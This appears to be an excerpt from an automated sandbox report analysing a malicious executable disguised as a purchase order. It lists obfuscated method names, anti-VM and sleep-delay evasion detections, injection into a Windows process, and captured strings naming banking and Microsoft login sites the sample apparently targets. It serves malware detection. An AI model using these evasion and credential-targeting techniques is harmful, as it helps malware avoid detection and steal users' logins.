            Source: 0.2.PO_YTWHDF3432.exe.3d61ab0.10.raw.unpack, k4iOvJ9qBQE1HdxkNd.csHigh entropy of concatenated method names: 'ppeShtPhhQ', 'e9CS7vOYd2', 'oWHS9OOF4P', 'UsiSsf4AL6', 'fpUS6ZpLxb', 'LXPSagvaeU', 'Kt1SJtnq8o', 'Cv3SVoAITs', 'MvwSuIBAut', 'pUYSgphCvG'
            Source: 0.2.PO_YTWHDF3432.exe.3d61ab0.10.raw.unpack, FUwdh2deYQx2wHTHN8.csHigh entropy of concatenated method names: 'oWMCYaVMXA', 'zCXClWFyd9', 'pcmna6ILWH', 'tjenJmJim7', 'SYSnVeQiK0', 'AprnuUcyxa', 'Rd7ngguePT', 'B4PnHe7xGP', 'BNJn5PQdSK', 'cEDnhHOZk0'
            Source: 0.2.PO_YTWHDF3432.exe.3d61ab0.10.raw.unpack, IFmal6MnO9XewkWInC.csHigh entropy of concatenated method names: 'ntpnXqPgbt', 'gKxnt5WGvY', 'XttnTitswg', 'JpWnMI5vYs', 'c1HnSXRqPF', 'xCbnO4laVe', 'bZBnRwjdHr', 'J1VnxsgSFR', 'NpNnpL4X3Y', 'JEenIQA4CN'
            Source: 0.2.PO_YTWHDF3432.exe.3d61ab0.10.raw.unpack, a8QWheE1fArtTd1IMD.csHigh entropy of concatenated method names: 'XoWNU7NHJf', 'eIgNqnRRjf', 'jj2Nw2qd5l', 'zemNnAIayF', 'Lc3NCZwy9O', 'ym6NvErXSP', 'FMlNBbQQYM', 'CI7NEDQ3Gw', 'm8VNb4krDL', 'MO9NoCpJfn'
            Source: 0.2.PO_YTWHDF3432.exe.3d61ab0.10.raw.unpack, FyGb7yelJ0UQmvijnD.csHigh entropy of concatenated method names: 'sV0Q4crj8', 'FkTXDGU6X', 'qcptoQdjw', 'PAYlLyOH4', 'nW9MjcUgs', 'RAmdradxQ', 'XcY2dF3gTnIuB9MNE0', 'MJb9cAUqNNYSbZqInA', 'jSJxxrqmJ', 'S5PIWSIMd'
            Source: 0.2.PO_YTWHDF3432.exe.3d61ab0.10.raw.unpack, WSEWP1cm6Y0WOLwaHL.csHigh entropy of concatenated method names: 'f7b4THXssr', 'mbB4MTbNvi', 'AJJ4kycBII', 'm5Z46eIlgC', 'WCt4JRAvVY', 'ECD4VFKvHY', 'Sf14gJos9q', 'Gys4Hgajkq', 'uTy4hSAnCI', 'DpI43725qO'
            Source: 0.2.PO_YTWHDF3432.exe.3d61ab0.10.raw.unpack, TgQR0kzFV7P8eTbCZ5.csHigh entropy of concatenated method names: 'CanConvertFrom', 'ConvertFrom', 'ConvertTo', 'T4bp4OcUmy', 'cnxpSRTVAj', 'gTrpO3PVPI', 'jHtpRkHVDa', 't0RpxlqyJL', 'allppiNwGn', 'eZgpIvKRFI'
            Source: 0.2.PO_YTWHDF3432.exe.3d61ab0.10.raw.unpack, OibhrkrNhBZqI9i9ql8.csHigh entropy of concatenated method names: 'CanConvertFrom', 'ConvertFrom', 'ConvertTo', 'ENZI9DLX0M', 'SeMIshMD14', 'RnmIKSmpmG', 'BuEIGQ4ijM', 'z72I0fLRXg', 'vJdImt7iVc', 'FHFIL6nk4I'
            Source: 0.2.PO_YTWHDF3432.exe.3d61ab0.10.raw.unpack, GS1UTMAPYbZYfF8Vl4.csHigh entropy of concatenated method names: 'ipAprNkVrh', 'CnbpNug8Ku', 'GKnpZBt03Y', 'FC8pq9qmYi', 'vGIpwaAntI', 'Dc1pC1DDWK', 'vrUpvOVSxm', 'u9WxLHDLI4', 'baexibvdA4', 'Nsvx8Z8nOQ'
            Source: 0.2.PO_YTWHDF3432.exe.3d61ab0.10.raw.unpack, kqvlLgwHelwGGavCWV.csHigh entropy of concatenated method names: 'Dispose', 'Jytr8TyEFt', 'dpSe6m22Zw', 's6bddSHJII', 'e1lrA83SRi', 'wpdrz6Ldws', 'ProcessDialogKey', 'y2reyKWvcM', 'ocJer0vxQs', 'NdyeekS1UT'
            Source: 0.2.PO_YTWHDF3432.exe.3d61ab0.10.raw.unpack, Jh3cp6k9XQgj8BWZQV.csHigh entropy of concatenated method names: 'KcmvUruQgJ', 'uhGvwMDnOf', 'AJcvCYo1Oc', 'D97vBPmccH', 'bx1vEXxVYV', 'JHJC0puqpd', 'kJZCmfme1u', 'qZZCLERCIG', 'hETCixsNGk', 'T5ZC8WJwqD'
            Source: 0.2.PO_YTWHDF3432.exe.3d61ab0.10.raw.unpack, B8ssm5gnwOgkecqMjA.csHigh entropy of concatenated method names: 'tefBqxTWLr', 'pohBny6sPo', 'llhBvawbod', 'AXmvApwsB9', 'dIKvz8Avd2', 'pJAByHpIFc', 'UUTBrqPGDr', 'f8YBe8sB33', 'eMTBNPANAC', 'R2LBZg1F9q'
            Source: 0.2.PO_YTWHDF3432.exe.3d61ab0.10.raw.unpack, xT9J6BTYqcjiUV51b1.csHigh entropy of concatenated method names: 'STPw9TtYeG', 'QnTwsZOuQl', 'uejwK5H5dc', 'm7jwGG1vxT', 'oaHw0bj6jN', 'WXHwmCSjdV', 'TVywL9iB2x', 'm8iwiXLmc1', 'apFw88auGE', 'c9wwApWaBt'
            Source: 0.2.PO_YTWHDF3432.exe.3d61ab0.10.raw.unpack, aKWvcM8ScJ0vxQshdy.csHigh entropy of concatenated method names: 'zDvxks7mu2', 'Dffx6RAwR2', 'yV7xak68hj', 'HWExJyAMmo', 'PTNx9wnOMd', 'CRrxVCUfRk', 'Next', 'Next', 'Next', 'NextBytes'
            Source: 0.2.PO_YTWHDF3432.exe.3d61ab0.10.raw.unpack, g3pKYLrrgIkl0W0EPMM.csHigh entropy of concatenated method names: 'ToString', 'aNyINZw7k4', 'KBuIZ25m1y', 'LVmIUAfpxS', 'CHIIqTclxV', 'jWmIwvsp77', 'ygSInp8klX', 'P3ZICqg684', 'GqyfZVHI7rP8WTF426r', 'DNF68QHAUATQjq3LBES'
            Source: 0.2.PO_YTWHDF3432.exe.3d61ab0.10.raw.unpack, OZDCYLZlMddJBkkgKb.csHigh entropy of concatenated method names: 'TU1rBT9J6B', 'BqcrEjiUV5', 'HnOro9Xewk', 'tInrDCdUwd', 'MTHrSN8Vh3', 'Qp6rO9XQgj', 'o2rbfBtD9twMm2O23y', 'nP7R5H26kjZXwCmhtY', 'C4arrjy5Vq', 'V7LrNHvg8t'
            Source: 0.2.PO_YTWHDF3432.exe.3d61ab0.10.raw.unpack, pwTTJeKkybpsv2KU7P.csHigh entropy of concatenated method names: 'ToString', 'MUpO3mwciV', 'RKwO6dF8mK', 'PGHOaxXCT3', 'OZgOJMsTVo', 'PnXOVJ0heI', 'j6YOukL5MC', 'qCeOgjLOFe', 'OmfOHyxNUs', 'j6HO56W17l'
            Source: 0.2.PO_YTWHDF3432.exe.3d61ab0.10.raw.unpack, YHUuMtG110d5GW4jFQ.csHigh entropy of concatenated method names: 'eV6RoQsrWv', 'P08RDWeh9V', 'ToString', 'fnLRq8cfhU', 'bGtRw5m3fI', 'HciRnA2bQ2', 'IeVRCxMhWT', 'CdNRvS0JQL', 'r3KRBINfFy', 'Qr8REdBAD5'
            Source: 0.2.PO_YTWHDF3432.exe.3d61ab0.10.raw.unpack, wl83SRiifpd6LdwsF2.csHigh entropy of concatenated method names: 'xVWxqqGAsr', 'sklxwIw6EC', 'jytxnka9rZ', 'd1AxC85BP2', 'vdIxvbkPgh', 'cNRxBV86j5', 'SPPxEO1adU', 'SS8xblBROH', 'GRIxoF4dvr', 'ogwxDH8nlg'
            Source: 0.2.PO_YTWHDF3432.exe.6c50000.13.raw.unpack, BErXB0rynt92BiVXuGp.csHigh entropy of concatenated method names: 'iVQpjl5DRB', 'AX7pFqdIw9', 'QNvpQQsIQa', 'cGepX6k6K9', 'ikipYv13dQ', 'rBmptfWOMZ', 'kTiplde5E7', 'ttGpTQxsac', 'HrjpMtWEUA', 'awSpdSTDfP'
            Source: 0.2.PO_YTWHDF3432.exe.6c50000.13.raw.unpack, R3MsDW5Ft4b7TnIado.csHigh entropy of concatenated method names: 'LmRBj9msZM', 'xSdBFEyWw6', 'zDfBQgqHMJ', 'iApBXJiMrV', 'oIpBYHHAUA', 'Q6nBt6e8Vs', 'Is7BlTlKvh', 'U6PBTZdWSS', 'ArOBMDkNP1', 'SDCBdgTV8w'
            Source: 0.2.PO_YTWHDF3432.exe.6c50000.13.raw.unpack, sY7H7rmOFKuJuJyqYu.csHigh entropy of concatenated method names: 't94RiIFpSH', 'r5aRAF02mj', 'VU1xyesDvL', 'cifxrSWD4D', 'OsER3AmR9q', 'sGbR74KV45', 'R3DRcjEDf3', 'GobR9KS5WL', 'QJCRs2VySV', 'ntGRKHuFYF'
            Source: 0.2.PO_YTWHDF3432.exe.6c50000.13.raw.unpack, k4iOvJ9qBQE1HdxkNd.csHigh entropy of concatenated method names: 'ppeShtPhhQ', 'e9CS7vOYd2', 'oWHS9OOF4P', 'UsiSsf4AL6', 'fpUS6ZpLxb', 'LXPSagvaeU', 'Kt1SJtnq8o', 'Cv3SVoAITs', 'MvwSuIBAut', 'pUYSgphCvG'
            Source: 0.2.PO_YTWHDF3432.exe.6c50000.13.raw.unpack, FUwdh2deYQx2wHTHN8.csHigh entropy of concatenated method names: 'oWMCYaVMXA', 'zCXClWFyd9', 'pcmna6ILWH', 'tjenJmJim7', 'SYSnVeQiK0', 'AprnuUcyxa', 'Rd7ngguePT', 'B4PnHe7xGP', 'BNJn5PQdSK', 'cEDnhHOZk0'
            Source: 0.2.PO_YTWHDF3432.exe.6c50000.13.raw.unpack, IFmal6MnO9XewkWInC.csHigh entropy of concatenated method names: 'ntpnXqPgbt', 'gKxnt5WGvY', 'XttnTitswg', 'JpWnMI5vYs', 'c1HnSXRqPF', 'xCbnO4laVe', 'bZBnRwjdHr', 'J1VnxsgSFR', 'NpNnpL4X3Y', 'JEenIQA4CN'
            Source: 0.2.PO_YTWHDF3432.exe.6c50000.13.raw.unpack, a8QWheE1fArtTd1IMD.csHigh entropy of concatenated method names: 'XoWNU7NHJf', 'eIgNqnRRjf', 'jj2Nw2qd5l', 'zemNnAIayF', 'Lc3NCZwy9O', 'ym6NvErXSP', 'FMlNBbQQYM', 'CI7NEDQ3Gw', 'm8VNb4krDL', 'MO9NoCpJfn'
            Source: 0.2.PO_YTWHDF3432.exe.6c50000.13.raw.unpack, FyGb7yelJ0UQmvijnD.csHigh entropy of concatenated method names: 'sV0Q4crj8', 'FkTXDGU6X', 'qcptoQdjw', 'PAYlLyOH4', 'nW9MjcUgs', 'RAmdradxQ', 'XcY2dF3gTnIuB9MNE0', 'MJb9cAUqNNYSbZqInA', 'jSJxxrqmJ', 'S5PIWSIMd'
            Source: 0.2.PO_YTWHDF3432.exe.6c50000.13.raw.unpack, WSEWP1cm6Y0WOLwaHL.csHigh entropy of concatenated method names: 'f7b4THXssr', 'mbB4MTbNvi', 'AJJ4kycBII', 'm5Z46eIlgC', 'WCt4JRAvVY', 'ECD4VFKvHY', 'Sf14gJos9q', 'Gys4Hgajkq', 'uTy4hSAnCI', 'DpI43725qO'
            Source: 0.2.PO_YTWHDF3432.exe.6c50000.13.raw.unpack, TgQR0kzFV7P8eTbCZ5.csHigh entropy of concatenated method names: 'CanConvertFrom', 'ConvertFrom', 'ConvertTo', 'T4bp4OcUmy', 'cnxpSRTVAj', 'gTrpO3PVPI', 'jHtpRkHVDa', 't0RpxlqyJL', 'allppiNwGn', 'eZgpIvKRFI'
            Source: 0.2.PO_YTWHDF3432.exe.6c50000.13.raw.unpack, OibhrkrNhBZqI9i9ql8.csHigh entropy of concatenated method names: 'CanConvertFrom', 'ConvertFrom', 'ConvertTo', 'ENZI9DLX0M', 'SeMIshMD14', 'RnmIKSmpmG', 'BuEIGQ4ijM', 'z72I0fLRXg', 'vJdImt7iVc', 'FHFIL6nk4I'
            Source: 0.2.PO_YTWHDF3432.exe.6c50000.13.raw.unpack, GS1UTMAPYbZYfF8Vl4.csHigh entropy of concatenated method names: 'ipAprNkVrh', 'CnbpNug8Ku', 'GKnpZBt03Y', 'FC8pq9qmYi', 'vGIpwaAntI', 'Dc1pC1DDWK', 'vrUpvOVSxm', 'u9WxLHDLI4', 'baexibvdA4', 'Nsvx8Z8nOQ'
            Source: 0.2.PO_YTWHDF3432.exe.6c50000.13.raw.unpack, kqvlLgwHelwGGavCWV.csHigh entropy of concatenated method names: 'Dispose', 'Jytr8TyEFt', 'dpSe6m22Zw', 's6bddSHJII', 'e1lrA83SRi', 'wpdrz6Ldws', 'ProcessDialogKey', 'y2reyKWvcM', 'ocJer0vxQs', 'NdyeekS1UT'
            Source: 0.2.PO_YTWHDF3432.exe.6c50000.13.raw.unpack, Jh3cp6k9XQgj8BWZQV.csHigh entropy of concatenated method names: 'KcmvUruQgJ', 'uhGvwMDnOf', 'AJcvCYo1Oc', 'D97vBPmccH', 'bx1vEXxVYV', 'JHJC0puqpd', 'kJZCmfme1u', 'qZZCLERCIG', 'hETCixsNGk', 'T5ZC8WJwqD'
            Source: 0.2.PO_YTWHDF3432.exe.6c50000.13.raw.unpack, B8ssm5gnwOgkecqMjA.csHigh entropy of concatenated method names: 'tefBqxTWLr', 'pohBny6sPo', 'llhBvawbod', 'AXmvApwsB9', 'dIKvz8Avd2', 'pJAByHpIFc', 'UUTBrqPGDr', 'f8YBe8sB33', 'eMTBNPANAC', 'R2LBZg1F9q'
            Source: 0.2.PO_YTWHDF3432.exe.6c50000.13.raw.unpack, xT9J6BTYqcjiUV51b1.csHigh entropy of concatenated method names: 'STPw9TtYeG', 'QnTwsZOuQl', 'uejwK5H5dc', 'm7jwGG1vxT', 'oaHw0bj6jN', 'WXHwmCSjdV', 'TVywL9iB2x', 'm8iwiXLmc1', 'apFw88auGE', 'c9wwApWaBt'
            Source: 0.2.PO_YTWHDF3432.exe.6c50000.13.raw.unpack, aKWvcM8ScJ0vxQshdy.csHigh entropy of concatenated method names: 'zDvxks7mu2', 'Dffx6RAwR2', 'yV7xak68hj', 'HWExJyAMmo', 'PTNx9wnOMd', 'CRrxVCUfRk', 'Next', 'Next', 'Next', 'NextBytes'
            Source: 0.2.PO_YTWHDF3432.exe.6c50000.13.raw.unpack, g3pKYLrrgIkl0W0EPMM.csHigh entropy of concatenated method names: 'ToString', 'aNyINZw7k4', 'KBuIZ25m1y', 'LVmIUAfpxS', 'CHIIqTclxV', 'jWmIwvsp77', 'ygSInp8klX', 'P3ZICqg684', 'GqyfZVHI7rP8WTF426r', 'DNF68QHAUATQjq3LBES'
            Source: 0.2.PO_YTWHDF3432.exe.6c50000.13.raw.unpack, OZDCYLZlMddJBkkgKb.csHigh entropy of concatenated method names: 'TU1rBT9J6B', 'BqcrEjiUV5', 'HnOro9Xewk', 'tInrDCdUwd', 'MTHrSN8Vh3', 'Qp6rO9XQgj', 'o2rbfBtD9twMm2O23y', 'nP7R5H26kjZXwCmhtY', 'C4arrjy5Vq', 'V7LrNHvg8t'
            Source: 0.2.PO_YTWHDF3432.exe.6c50000.13.raw.unpack, pwTTJeKkybpsv2KU7P.csHigh entropy of concatenated method names: 'ToString', 'MUpO3mwciV', 'RKwO6dF8mK', 'PGHOaxXCT3', 'OZgOJMsTVo', 'PnXOVJ0heI', 'j6YOukL5MC', 'qCeOgjLOFe', 'OmfOHyxNUs', 'j6HO56W17l'
            Source: 0.2.PO_YTWHDF3432.exe.6c50000.13.raw.unpack, YHUuMtG110d5GW4jFQ.csHigh entropy of concatenated method names: 'eV6RoQsrWv', 'P08RDWeh9V', 'ToString', 'fnLRq8cfhU', 'bGtRw5m3fI', 'HciRnA2bQ2', 'IeVRCxMhWT', 'CdNRvS0JQL', 'r3KRBINfFy', 'Qr8REdBAD5'
            Source: 0.2.PO_YTWHDF3432.exe.6c50000.13.raw.unpack, wl83SRiifpd6LdwsF2.csHigh entropy of concatenated method names: 'xVWxqqGAsr', 'sklxwIw6EC', 'jytxnka9rZ', 'd1AxC85BP2', 'vdIxvbkPgh', 'cNRxBV86j5', 'SPPxEO1adU', 'SS8xblBROH', 'GRIxoF4dvr', 'ogwxDH8nlg'
            Source: C:\Users\user\Desktop\PO_YTWHDF3432.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\PO_YTWHDF3432.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\PO_YTWHDF3432.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\PO_YTWHDF3432.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\PO_YTWHDF3432.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\PO_YTWHDF3432.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\PO_YTWHDF3432.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\PO_YTWHDF3432.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\PO_YTWHDF3432.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\PO_YTWHDF3432.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\PO_YTWHDF3432.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\PO_YTWHDF3432.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\PO_YTWHDF3432.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\PO_YTWHDF3432.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\PO_YTWHDF3432.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\PO_YTWHDF3432.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\PO_YTWHDF3432.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\PO_YTWHDF3432.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\PO_YTWHDF3432.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\PO_YTWHDF3432.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\PO_YTWHDF3432.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\PO_YTWHDF3432.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\PO_YTWHDF3432.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\PO_YTWHDF3432.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\PO_YTWHDF3432.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\PO_YTWHDF3432.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\PO_YTWHDF3432.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\PO_YTWHDF3432.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\PO_YTWHDF3432.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\PO_YTWHDF3432.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\PO_YTWHDF3432.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\PO_YTWHDF3432.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\PO_YTWHDF3432.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\PO_YTWHDF3432.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\PO_YTWHDF3432.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\PO_YTWHDF3432.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\PO_YTWHDF3432.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\PO_YTWHDF3432.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\PO_YTWHDF3432.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\PO_YTWHDF3432.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\PO_YTWHDF3432.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\isoburn.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\isoburn.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\isoburn.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\isoburn.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\isoburn.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOXJump to behavior

            Malware Analysis System Evasion

            barindex
            Yara detected AntiVM3
            Source: Yara matchFile source: Process Memory Space: PO_YTWHDF3432.exe PID: 7680, type: MEMORYSTR
            Source: C:\Users\user\Desktop\PO_YTWHDF3432.exe TID: 7732Thread sleep time: -922337203685477s >= -30000sJump to behavior
            Source: C:\Windows\SysWOW64\isoburn.exe TID: 1664Thread sleep count: 138 > 30Jump to behavior
            Source: C:\Windows\SysWOW64\isoburn.exe TID: 1664Thread sleep time: -276000s >= -30000sJump to behavior
            Source: C:\Windows\SysWOW64\isoburn.exe TID: 1664Thread sleep count: 9834 > 30Jump to behavior
            Source: C:\Windows\SysWOW64\isoburn.exe TID: 1664Thread sleep time: -19668000s >= -30000sJump to behavior
            Source: C:\Program Files (x86)\lYJnPbGqvAsrVBzAPcNbjhtdadsuOwdLkJkdJlTqjCthtZqXvtQtzjRONIHEsNRRIFDhSny\qNENczArVjafOgvC.exe TID: 7844Thread sleep time: -75000s >= -30000sJump to behavior
            Source: C:\Program Files (x86)\lYJnPbGqvAsrVBzAPcNbjhtdadsuOwdLkJkdJlTqjCthtZqXvtQtzjRONIHEsNRRIFDhSny\qNENczArVjafOgvC.exe TID: 7844Thread sleep count: 37 > 30Jump to behavior
            Source: C:\Program Files (x86)\lYJnPbGqvAsrVBzAPcNbjhtdadsuOwdLkJkdJlTqjCthtZqXvtQtzjRONIHEsNRRIFDhSny\qNENczArVjafOgvC.exe TID: 7844Thread sleep time: -55500s >= -30000sJump to behavior
            Source: C:\Program Files (x86)\lYJnPbGqvAsrVBzAPcNbjhtdadsuOwdLkJkdJlTqjCthtZqXvtQtzjRONIHEsNRRIFDhSny\qNENczArVjafOgvC.exe TID: 7844Thread sleep count: 34 > 30Jump to behavior
            Source: C:\Program Files (x86)\lYJnPbGqvAsrVBzAPcNbjhtdadsuOwdLkJkdJlTqjCthtZqXvtQtzjRONIHEsNRRIFDhSny\qNENczArVjafOgvC.exe TID: 7844Thread sleep time: -34000s >= -30000sJump to behavior
            Source: C:\Windows\SysWOW64\isoburn.exeLast function: Thread delayed
            Source: C:\Windows\SysWOW64\isoburn.exeLast function: Thread delayed
            Source: C:\Users\user\Desktop\PO_YTWHDF3432.exeCode function: 3_2_0192096E rdtsc 3_2_0192096E
            Source: C:\Users\user\Desktop\PO_YTWHDF3432.exeThread delayed: delay time: 922337203685477Jump to behavior
            Source: C:\Windows\SysWOW64\isoburn.exeWindow / User API: threadDelayed 9834Jump to behavior
            Source: C:\Users\user\Desktop\PO_YTWHDF3432.exeAPI coverage: 1.4 %
            Source: C:\Windows\SysWOW64\isoburn.exeAPI coverage: 2.6 %
            Source: C:\Users\user\Desktop\PO_YTWHDF3432.exeProcess information queried: ProcessInformationJump to behavior
            Source: C:\Windows\SysWOW64\isoburn.exeCode function: 11_2_02EDC280 FindFirstFileW,FindNextFileW,FindClose,11_2_02EDC280
            Source: C:\Users\user\Desktop\PO_YTWHDF3432.exeThread delayed: delay time: 922337203685477Jump to behavior
            Source: 7e327r58.11.drBinary or memory string: Interactive userers - NDCDYNVMware20,11696501413z
            Source: 7e327r58.11.drBinary or memory string: tasks.office.comVMware20,11696501413o
            Source: 7e327r58.11.drBinary or memory string: trackpan.utiitsl.comVMware20,11696501413h
            Source: 7e327r58.11.drBinary or memory string: netportal.hdfcbank.comVMware20,11696501413
            Source: 7e327r58.11.drBinary or memory string: www.interactiveuserers.co.inVMware20,11696501413~
            Source: 7e327r58.11.drBinary or memory string: dev.azure.comVMware20,11696501413j
            Source: qNENczArVjafOgvC.exe, 0000000D.00000002.3731579280.00000000013BF000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dllM
            Source: 7e327r58.11.drBinary or memory string: Interactive userers - COM.HKVMware20,11696501413
            Source: 7e327r58.11.drBinary or memory string: Test URL for global passwords blocklistVMware20,11696501413
            Source: 7e327r58.11.drBinary or memory string: secure.bankofamerica.comVMware20,11696501413|UE
            Source: 7e327r58.11.drBinary or memory string: bankofamerica.comVMware20,11696501413x
            Source: 7e327r58.11.drBinary or memory string: Canara Transaction PasswordVMware20,11696501413}
            Source: 7e327r58.11.drBinary or memory string: Interactive userers - non-EU EuropeVMware20,11696501413
            Source: 7e327r58.11.drBinary or memory string: Canara Transaction PasswordVMware20,11696501413x
            Source: 7e327r58.11.drBinary or memory string: turbotax.intuit.comVMware20,11696501413t
            Source: 7e327r58.11.drBinary or memory string: Interactive userers - HKVMware20,11696501413]
            Source: 7e327r58.11.drBinary or memory string: outlook.office.comVMware20,11696501413s
            Source: 7e327r58.11.drBinary or memory string: Interactive userers - EU East & CentralVMware20,11696501413
            Source: 7e327r58.11.drBinary or memory string: account.microsoft.com/profileVMware20,11696501413u
            Source: 7e327r58.11.drBinary or memory string: Interactive userers - GDCDYNVMware20,11696501413p
            Source: 7e327r58.11.drBinary or memory string: Interactive userers - EU WestVMware20,11696501413n
            Source: 7e327r58.11.drBinary or memory string: ms.portal.azure.comVMware20,11696501413
            Source: 7e327r58.11.drBinary or memory string: Canara Change Transaction PasswordVMware20,11696501413
            Source: 7e327r58.11.drBinary or memory string: www.interactiveuserers.comVMware20,11696501413}
            Source: 7e327r58.11.drBinary or memory string: interactiveuserers.co.inVMware20,11696501413d
            Source: 7e327r58.11.drBinary or memory string: microsoft.visualstudio.comVMware20,11696501413x
            Source: 7e327r58.11.drBinary or memory string: global block list test formVMware20,11696501413
            Source: 7e327r58.11.drBinary or memory string: outlook.office365.comVMware20,11696501413t
            Source: 7e327r58.11.drBinary or memory string: Canara Change Transaction PasswordVMware20,11696501413^
            Source: 7e327r58.11.drBinary or memory string: interactiveuserers.comVMware20,11696501413
            Source: 7e327r58.11.drBinary or memory string: discord.comVMware20,11696501413f
            Source: 7e327r58.11.drBinary or memory string: AMC password management pageVMware20,11696501413
            Source: C:\Users\user\Desktop\PO_YTWHDF3432.exeCode function: 3_2_0192096E rdtsc 3_2_0192096E
            Source: C:\Users\user\Desktop\PO_YTWHDF3432.exeCode function: 3_2_0196019F mov eax, dword ptr fs:[00000030h]3_2_0196019F
            Source: C:\Users\user\Desktop\PO_YTWHDF3432.exeCode function: 3_2_0196019F mov eax, dword ptr fs:[00000030h]3_2_0196019F
            Source: C:\Users\user\Desktop\PO_YTWHDF3432.exeCode function: 3_2_0196019F mov eax, dword ptr fs:[00000030h]3_2_0196019F
            Source: C:\Users\user\Desktop\PO_YTWHDF3432.exeCode function: 3_2_0196019F mov eax, dword ptr fs:[00000030h]3_2_0196019F
            Source: C:\Users\user\Desktop\PO_YTWHDF3432.exeCode function: 3_2_0199C188 mov eax, dword ptr fs:[00000030h]3_2_0199C188
            Source: C:\Users\user\Desktop\PO_YTWHDF3432.exeCode function: 3_2_0199C188 mov eax, dword ptr fs:[00000030h]3_2_0199C188
            Source: C:\Users\user\Desktop\PO_YTWHDF3432.exeCode function: 3_2_01920185 mov eax, dword ptr fs:[00000030h]3_2_01920185
            Source: C:\Users\user\Desktop\PO_YTWHDF3432.exeCode function: 3_2_01984180 mov eax, dword ptr fs:[00000030h]3_2_01984180
            Source: C:\Users\user\Desktop\PO_YTWHDF3432.exeCode function: 3_2_01984180 mov eax, dword ptr fs:[00000030h]3_2_01984180
            Source: C:\Users\user\Desktop\PO_YTWHDF3432.exeCode function: 3_2_018DA197 mov eax, dword ptr fs:[00000030h]3_2_018DA197
            Source: C:\Users\user\Desktop\PO_YTWHDF3432.exeCode function: 3_2_018DA197 mov eax, dword ptr fs:[00000030h]3_2_018DA197
            Source: C:\Users\user\Desktop\PO_YTWHDF3432.exeCode function: 3_2_018DA197 mov eax, dword ptr fs:[00000030h]3_2_018DA197
            Source: C:\Users\user\Desktop\PO_YTWHDF3432.exeCode function: 3_2_0195E1D0 mov eax, dword ptr fs:[00000030h]3_2_0195E1D0
            Source: C:\Users\user\Desktop\PO_YTWHDF3432.exeCode function: 3_2_0195E1D0 mov eax, dword ptr fs:[00000030h]3_2_0195E1D0
            Source: C:\Users\user\Desktop\PO_YTWHDF3432.exeCode function: 3_2_0195E1D0 mov ecx, dword ptr fs:[00000030h]3_2_0195E1D0
            Source: C:\Users\user\Desktop\PO_YTWHDF3432.exeCode function: 3_2_0195E1D0 mov eax, dword ptr fs:[00000030h]3_2_0195E1D0
